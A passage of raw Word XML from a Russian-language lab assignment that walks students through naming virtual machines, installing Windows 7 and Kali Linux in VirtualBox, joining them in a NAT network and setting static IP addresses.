          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="434DB488" wp14:editId="000C66C1">
            <wp:extent cx="6120000" cy="286779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005F" w14:textId="27B9F6FA" w:rsidR="00437416" w:rsidRDefault="00437416" w:rsidP="009A06FD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00437416">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Название</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> вашей виртуальной машины </w:t>
      </w:r>
      <w:r w:rsidRPr="00437416">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>должно</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> содержать:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2444AD16" w14:textId="0AAD0B6E" w:rsidR="00437416" w:rsidRPr="00437416" w:rsidRDefault="00437416" w:rsidP="00437416">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Наименование ОС, например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WinServer2008</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9C279F" w14:textId="170791EB" w:rsidR="00437416" w:rsidRDefault="00437416" w:rsidP="00437416">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Вашу ФИО, например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AVD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1875B0BA" w14:textId="2709932B" w:rsidR="00437416" w:rsidRDefault="00437416" w:rsidP="00437416">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Номер группы, например, 41</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355FB04A" w14:textId="34A42550" w:rsidR="00437416" w:rsidRDefault="00437416" w:rsidP="00437416">
      <w:r>
        <w:t>В финальном варианте должно получиться примерно такое название:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18384ECC" w14:textId="18ADF5D5" w:rsidR="00437416" w:rsidRDefault="00437416" w:rsidP="00437416">
      <w:r w:rsidRPr="00437416">
        <w:t>WinSer08AVD</w:t>
      </w:r>
      <w:r>
        <w:t>41</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BCBD3A" w14:textId="77A1EAD0" w:rsidR="00D5322A" w:rsidRPr="00437416" w:rsidRDefault="00D5322A" w:rsidP="00437416">
      <w:r>
        <w:t>Аналогично необходимо дать название оставшимся виртуальным машинам</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C548C98" w14:textId="77777777" w:rsidR="00076398" w:rsidRDefault="00076398">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4801824A" w14:textId="176B597B" w:rsidR="009A06FD" w:rsidRDefault="009A06FD" w:rsidP="009A06FD">
      <w:r w:rsidRPr="00742EBE">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:t>Установить</w:t>
      </w:r>
      <w:r w:rsidRPr="00742EBE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00742EBE">
        <w:t xml:space="preserve"> 7 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Pro</w:t>
      </w:r>
      <w:r w:rsidRPr="00742EBE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SP</w:t>
      </w:r>
      <w:r w:rsidRPr="00742EBE">
        <w:t xml:space="preserve">1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="00742EBE">
        <w:t>64</w:t>
      </w:r>
      <w:r w:rsidR="002C2E51">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00634D6D">
        <w:t>на виртуальную машину</w:t>
      </w:r>
      <w:r w:rsidR="00DB30B6">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B93C02C" w14:textId="6FB7E9BC" w:rsidR="00663CEF" w:rsidRPr="002C2E51" w:rsidRDefault="00663CEF" w:rsidP="009A06FD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D8ECEA6" wp14:editId="7803DA46">
            <wp:extent cx="6120000" cy="1561577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4706"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120000" cy="156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02D44" w14:textId="126F6059" w:rsidR="002C2E51" w:rsidRDefault="002C2E51" w:rsidP="009A06FD">
      <w:r w:rsidRPr="002239E3">
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Создать </w:t>
      </w:r>
      <w:r w:rsidR="00634D6D">
        <w:t xml:space="preserve">на виртуальную машину </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:r w:rsidRPr="002239E3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidR="00E5347E" w:rsidRPr="008B0A9A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E5347E" w:rsidRPr="002239E3">
        <w:t>2020.1</w:t>
      </w:r>
      <w:r w:rsidRPr="002239E3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>live</w:t>
      </w:r>
      <w:r w:rsidRPr="002239E3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002239E3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="002239E3" w:rsidRPr="00B34A2E">
        <w:t>64</w:t>
      </w:r>
      <w:r w:rsidR="00DB30B6">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEDF8B8" w14:textId="71695708" w:rsidR="00634D6D" w:rsidRPr="00634D6D" w:rsidRDefault="00634D6D" w:rsidP="009A06FD">
      <w:r>
        <w:t xml:space="preserve">В случае, если у Вас с лабораторной работы № 2 осталась созданная виртуальная машина с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:r w:rsidRPr="00634D6D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r>
        <w:t>, то Вы можете использовать её.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2505887C" w14:textId="6DCB193B" w:rsidR="00E8399B" w:rsidRDefault="00E8399B" w:rsidP="009A06FD">
      <w:r w:rsidRPr="00150CF3">
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Объединить </w:t>
      </w:r>
      <w:r w:rsidR="0098784F">
        <w:t xml:space="preserve">все 3 виртуальных компьютера </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">в </w:t>
      </w:r>
      <w:r w:rsidR="00634D6D">
        <w:t xml:space="preserve">единую </w:t>
      </w:r>
      <w:r>
        <w:t>локальную сеть</w:t>
      </w:r>
      <w:r w:rsidR="00DB30B6">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7E4B6D" w14:textId="07C6B0F8" w:rsidR="00634D6D" w:rsidRDefault="00634D6D" w:rsidP="009A06FD">
      <w:r>
        <w:t>На данном шаге рекомендуется установить «</w:t>
      </w:r>
      <w:commentRangeStart w:id="0"/>
      <w:r>
        <w:t xml:space="preserve">Сеть </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NAT</w:t>
      </w:r>
      <w:commentRangeEnd w:id="0"/>
      <w:r w:rsidR="00D850BF">
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:commentReference w:id="0"/>
      </w:r>
      <w:r>
        <w:t>» для всех виртуальных машин стенда</w:t>
      </w:r>
      <w:r w:rsidR="0027303B">
        <w:t>, а также оставить работающим только один адаптер</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65567810" w14:textId="27224057" w:rsidR="00D850BF" w:rsidRDefault="00D850BF" w:rsidP="00D850BF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30844FF1" wp14:editId="5EFB8AD8">
            <wp:extent cx="1666875" cy="10953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7544" w14:textId="77777777" w:rsidR="00663CEF" w:rsidRDefault="00663CEF" w:rsidP="00663CEF">
      <w:r>
        <w:t xml:space="preserve">4.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00487741">
        <w:t xml:space="preserve">"Файл" =&gt; "Настройки" =&gt; "Сеть" =&gt; перейдите на вкладку "Сети </w:t>
      </w:r>
      <w:r w:rsidRPr="00487741">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NAT</w:t>
      </w:r>
      <w:r w:rsidRPr="00487741">
        <w:t xml:space="preserve">". </w:t>
      </w:r>
      <w:r>
        <w:t>Н</w:t>
      </w:r>
      <w:r w:rsidRPr="00487741">
        <w:t>ажмите кнопку с зеленым плюсом, чтобы создать новую сеть</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680B1249" w14:textId="06C31950" w:rsidR="00663CEF" w:rsidRPr="00663CEF" w:rsidRDefault="00663CEF" w:rsidP="00663CEF">
      <w:r>
        <w:t xml:space="preserve">4.2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00487741">
        <w:t>Нажмите "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00487741">
        <w:t>Ok</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00487741">
        <w:t xml:space="preserve">" и закройте окно. </w:t>
      </w:r>
      <w:r>
        <w:t>О</w:t>
      </w:r>
      <w:r w:rsidRPr="00487741">
        <w:t xml:space="preserve">ткройте настройки для виртуальной машины, перейдите на вкладку "Сеть" </w:t>
      </w:r>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00487741">
        <w:t>&gt; "Адаптер 1"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00202E72">
        <w:t>Выберите "Тип подключения" - "Сеть NAT", а "Имя" - только что созданную сеть.</w:t>
      </w:r>
      <w:r w:rsidRPr="00663CEF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1701B1A2" w14:textId="526AC1A9" w:rsidR="004B10E0" w:rsidRDefault="004B10E0" w:rsidP="009A06FD">
      <w:r>
        <w:t xml:space="preserve">Обратите внимание, что сеть </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> можно установить не только в настройках каждой отдельной виртуальной машины, но и для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>VB</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в целом.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649448E2" w14:textId="5F7E3EB6" w:rsidR="004B10E0" w:rsidRPr="004B10E0" w:rsidRDefault="004B10E0" w:rsidP="009A06FD">
      <w:r w:rsidRPr="00185EBD">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0938AC41" wp14:editId="793E9721">
            <wp:extent cx="5400000" cy="351188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1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BD69" w14:textId="501AE43D" w:rsidR="00E8399B" w:rsidRDefault="00E8399B" w:rsidP="009A06FD">
      <w:r w:rsidRPr="00E8399B">
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r w:rsidR="00B631A3">
        <w:t>Запустить виртуальные машины и п</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">рописать статические </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-адреса для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00E8399B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
      <w:r w:rsidRPr="00E8399B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">и </w:t>
      </w:r>
      <w:commentRangeStart w:id="1"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00E8399B">
        <w:t xml:space="preserve"> 7</w:t>
      </w:r>
      <w:commentRangeEnd w:id="1"/>
      <w:r w:rsidR="00DB30B6">
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:commentReference w:id="1"/>
      </w:r>
      <w:r w:rsidR="00DB30B6">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B2D8E5" w14:textId="3C07C832" w:rsidR="00966DB6" w:rsidRDefault="00966DB6" w:rsidP="009A06FD">
      <w:r>
        <w:t>С настоящего момента начинается процесс настройки виртуальных машин, который будет состоять из множества этапов. Разумным при выполнении большого объема работ является сохранение состояния виртуальных машин до внесения значимых изменений в процесс их функционирований. Не забывайте пользоваться функцией «Сделать снимок состояния» для сохранения своих нервных клеток.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660BABFD" w14:textId="0A3D3B13" w:rsidR="00966DB6" w:rsidRPr="00966DB6" w:rsidRDefault="00966DB6" w:rsidP="00966DB6">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A100531" wp14:editId="22A7C23D">
            <wp:extent cx="5400000" cy="1464165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6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D885" w14:textId="2763C522" w:rsidR="00C11F14" w:rsidRDefault="00C11F14" w:rsidP="009A06FD">
      <w:r>
        <w:t xml:space="preserve">5.1. При запуске </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00C11F14">
        <w:t xml:space="preserve"> 7 </w:t>
      </w:r>
      <w:r>
        <w:t>выбрать «Сеть предприятия»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398E8391" w14:textId="12B77DFB" w:rsidR="00C11F14" w:rsidRDefault="00C11F14" w:rsidP="009A06FD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0ABF79FB" wp14:editId="241F1F31">
            <wp:extent cx="5399405" cy="436728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470"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400000" cy="436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D4A3" w14:textId="3F4F3F4A" w:rsidR="00C11F14" w:rsidRPr="00D76715" w:rsidRDefault="00C11F14" w:rsidP="009A06FD">
      <w:r>
        <w:t>5.2. В настройках «Центра управления сетями» («</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Network</w:t>
      </w:r>
      <w:r w:rsidRPr="00C11F14">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="00C11F14">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sharing</w:t>
      </w:r>
      <w:r w:rsidRPr="00C11F14">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Center</w:t>
      </w:r>
      <w:r>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00C11F14">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> выбрать пункт «Изменение параметров адаптера» («</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Change</w:t>
      </w:r>
      <w:r w:rsidRPr="00C11F14">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>adapter</w:t>
      </w:r>
      <w:r w:rsidRPr="00C11F14">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>settings</w:t>
      </w:r>
      <w:r>
        <w:t>»)</w:t>
      </w:r>
      <w:r w:rsidR="00D76715">
        <w:t xml:space="preserve"> и открыть свойства «подключения по локальной сети» («</w:t>
      </w:r>
      <w:r w:rsidR="00D76715">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Local</w:t>
      </w:r>
      <w:r w:rsidR="00D76715" w:rsidRPr="00D76715">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D76715">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Area</w:t>
      </w:r>
      <w:r w:rsidR="00D76715" w:rsidRPr="00D76715">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D76715">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Connection</w:t>
      </w:r>
      <w:r w:rsidR="00D76715" w:rsidRPr="00D76715">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D76715">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Properties</w:t>
      </w:r>
      <w:r w:rsidR="00D76715">
        <w:t>»). Выделить «Протокол Интернета версии 4 (</w:t>
      </w:r>
      <w:r w:rsidR="00D76715">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidR="00D76715" w:rsidRPr="00D76715">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D76715">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IPv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D76715" w:rsidRPr="00D76715">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00D76715">
        <w:t>)» («</w:t>
      </w:r>
      <w:r w:rsidR="00D76715">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Internet</w:t>
      </w:r>
      <w:r w:rsidR="00D76715" w:rsidRPr="00D76715">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D76715">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Protocol</w:t>
      </w:r>
      <w:r w:rsidR="00D76715" w:rsidRPr="00D76715">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D76715">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Version</w:t>
      </w:r>
      <w:r w:rsidR="00D76715" w:rsidRPr="00D76715">
        <w:t xml:space="preserve"> 4</w:t>
      </w:r>
      <w:r w:rsidR="00D76715">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00D76715">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidR="00D76715" w:rsidRPr="00D76715">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D76715">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IPv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D76715" w:rsidRPr="00D76715">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00D76715">
        <w:t>)») и открыть его «Свойства» («</w:t>
      </w:r>
      <w:r w:rsidR="00D76715">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Properties</w:t>
      </w:r>
      <w:r w:rsidR="00D76715">
        <w:t>»)</w:t>
      </w:r>
      <w:r w:rsidR="00D76715" w:rsidRPr="00D76715">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00D76715">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C65E2D6" w14:textId="736D0029" w:rsidR="00D76715" w:rsidRDefault="00D76715" w:rsidP="00F7668A">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D799B8E" wp14:editId="1F82CD86">
            <wp:extent cx="6120000" cy="25805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CF3A" w14:textId="61710FE4" w:rsidR="001A62A9" w:rsidRPr="00D76715" w:rsidRDefault="007C5553" w:rsidP="007C5553">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.3. </w:t>
      </w:r>
      <w:r w:rsidR="001A62A9">
        <w:t>Пропишите статические адреса для обеих виртуальных машин</w:t>
      </w:r>
      <w:r w:rsidR="002103B9">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730124E3" w14:textId="6E02DAF1" w:rsidR="001A62A9" w:rsidRPr="001A62A9" w:rsidRDefault="001A62A9" w:rsidP="002103B9">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В поле </w:t>
      </w:r>
      <w:r w:rsidRPr="002103B9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ip</w:t>
      </w:r>
      <w:r w:rsidRPr="001A62A9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>вписать значение из</w:t>
      </w:r>
      <w:r w:rsidRPr="001A62A9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002103B9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ipconfig</w:t>
      </w:r>
      <w:r w:rsidRPr="001A62A9">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:r w:rsidRPr="002103B9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>all</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (вызвать консоль </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002103B9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF0FC0C" w14:textId="676AD3EF" w:rsidR="001A62A9" w:rsidRPr="001A62A9" w:rsidRDefault="001A62A9" w:rsidP="002103B9">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">В поле макса подсети: </w:t>
      </w:r>
      <w:r w:rsidRPr="001A62A9">
        <w:t>255.255.255.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71021B45" w14:textId="4807035D" w:rsidR="001A62A9" w:rsidRPr="001A62A9" w:rsidRDefault="001A62A9" w:rsidP="002103B9">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В поле </w:t>
      </w:r>
      <w:r w:rsidRPr="002103B9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Gateway</w:t>
      </w:r>
      <w:r w:rsidRPr="001A62A9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>вписать значение из</w:t>
      </w:r>
      <w:r w:rsidRPr="001A62A9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002103B9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ipconfig</w:t>
      </w:r>
      <w:r w:rsidRPr="001A62A9">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:r w:rsidRPr="002103B9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DD07C5" w14:textId="5ED46197" w:rsidR="001A62A9" w:rsidRDefault="001A62A9" w:rsidP="002103B9">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Заполнить поля </w:t>
      </w:r>
      <w:r w:rsidRPr="002103B9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00663CEF">
        <w:t xml:space="preserve"> 127.0.0.1 </w:t>
      </w:r>
      <w:r>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="00663CEF">
        <w:t xml:space="preserve"> 8.8.8.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1538F2E5" w14:textId="046296C0" w:rsidR="00D76715" w:rsidRDefault="001A62A9" w:rsidP="00DF6AFD">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:commentRangeStart w:id="2"/>
      <w:r w:rsidRPr="00CE35EE">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="553DE564" wp14:editId="36D062D9">
            <wp:extent cx="6120000" cy="285819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5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9E6CEC">
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:commentReference w:id="2"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C366B20" w14:textId="58FC54B8" w:rsidR="000A3014" w:rsidRDefault="001A62A9" w:rsidP="00663CEF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Проверить</w:t>
      </w:r>
      <w:r w:rsidRPr="001A62A9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
